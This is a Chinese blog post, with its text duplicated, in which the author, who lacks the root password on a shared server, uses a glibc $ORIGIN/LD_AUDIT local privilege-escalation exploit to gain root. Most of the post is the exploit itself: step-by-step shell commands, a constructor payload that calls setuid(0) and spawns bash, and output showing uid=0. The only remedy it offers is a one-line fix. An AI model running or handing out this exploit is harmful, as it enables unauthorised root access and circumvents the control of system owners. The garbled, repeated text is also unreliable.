linux2.6内核本地提权,低权限获取root
2013-06-20 18:09
435 查看
前言:额、一台linux 服务器PHP 版本太低。。需要升级才能使用ThinkPHP框架,可是我没有root密码,无法升级,虽然是在虚拟集群中的服务器,但是也没有集群的密码,如果直接用修改启动项方式去修改root密码的话,1是太麻烦,2是额、技术含量也太低 。。经过一番百度、Google,发现2.6的内核有一个漏洞, N次失败之后终于找到一能用的神器。操作过程如下。。 神奇的让$---变成-># 我也不懂什么意思,,直接上代码:
It is possible to exploit this flaw to execute arbitrary code as root.Please note, this is a low impact vulnerability that is only of interest to
security professionals and system administrators. End users do not need
to be concerned.Exploitation would look like the following.# Create a directory in /tmp we can control.$ mkdir /tmp/exploit # Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target # Open a file descriptor to the target binary (note: some users are surprised# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).$ exec 3< /tmp/exploit/target # This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1taviso taviso 64Oct 1509:21/proc/10836/fd/3->/tmp/exploit/target*# Remove the directory previously created$ rm -rf /tmp/exploit/# The /proc link should still exist, but now will be marked deleted.$ ls -l /proc/$$/fd/3lr-x------ 1taviso taviso 64Oct 1509:21/proc/10836/fd/3->/tmp/exploit/target (deleted)# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().$ cat >payload.c void __attribute__((constructor)) init(){ setuid(0); system("/bin/bash"); }
#此处有一个回车
#(此处ctrl+c结束 )
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c$ ls -l /tmp/exploit-rwxrwx---1taviso taviso 4.2K Oct 1509:22/tmp/exploit*
# Now force the link in /proc to load $ORIGIN via LD_AUDIT.$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3sh-4.1# whoamiroot sh-4.1# iduid=0(root)gid=500(taviso)漏洞解决方法(这是由GCC引发的一个漏洞):
升级:glibc、
It is possible to exploit this flaw to execute arbitrary code as root.Please note, this is a low impact vulnerability that is only of interest to
security professionals and system administrators. End users do not need
to be concerned.Exploitation would look like the following.# Create a directory in /tmp we can control.$ mkdir /tmp/exploit # Link to an suid binary, thus changing the definition of $ORIGIN.
$ ln /bin/ping /tmp/exploit/target # Open a file descriptor to the target binary (note: some users are surprised# to learn exec can be used to manipulate the redirections of the current
# shell if a command is not specified. This is what is happening below).$ exec 3< /tmp/exploit/target # This descriptor should now be accessible via /proc.
$ ls -l /proc/$$/fd/3
lr-x------ 1taviso taviso 64Oct 1509:21/proc/10836/fd/3->/tmp/exploit/target*# Remove the directory previously created$ rm -rf /tmp/exploit/# The /proc link should still exist, but now will be marked deleted.$ ls -l /proc/$$/fd/3lr-x------ 1taviso taviso 64Oct 1509:21/proc/10836/fd/3->/tmp/exploit/target (deleted)# Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen().$ cat >payload.c void __attribute__((constructor)) init(){ setuid(0); system("/bin/bash"); }
#此处有一个回车
#(此处ctrl+c结束 )
$ gcc -w -fPIC -shared -o /tmp/exploit payload.c$ ls -l /tmp/exploit-rwxrwx---1taviso taviso 4.2K Oct 1509:22/tmp/exploit*
# Now force the link in /proc to load $ORIGIN via LD_AUDIT.$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3sh-4.1# whoamiroot sh-4.1# iduid=0(root)gid=500(taviso)漏洞解决方法(这是由GCC引发的一个漏洞):
升级:glibc、
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- linux2.6内核本地提权,低权限获取root
- Linux2.6内核本地提权
- linux2.6内核本地提权
- Linux 2.6.* 内核Capability LSM模块进程特权信任状本地权限提升漏洞
- 新装 linux 系统获取 root 权限
- linux非交互环境下本地提权思路与反思 linux localroot exploit
- Linux下用户获取root权限执行程序
- linux本地内核提权漏洞 Dirty COW 成因分析
- 刚装好的linux系统如何获取root的权限
- 提权后获取linux root密码
- “脏牛(Dirty Cow)”漏洞】CVE-2016-5195:Linux 内核本地提权漏洞 通告及修复
- 在linux 2.6内核下建立字符设备,自动获取设备号,建立设备节点的简单例子
- Linux2.6内核中链表的实现
- Linux内核获取当前进程指针
- Linux-2.6 内核软中断(softirq)执行分析
- 在Linux 2.6内核下编译可以加载的内核模块_转载
- Linux下获取本地IP地址--------getifaddrs
- linux 内核 时间 获取
- Linux内核中获取时间函数do_gettimeofday
- linux 2.6内核epoll用法举例说明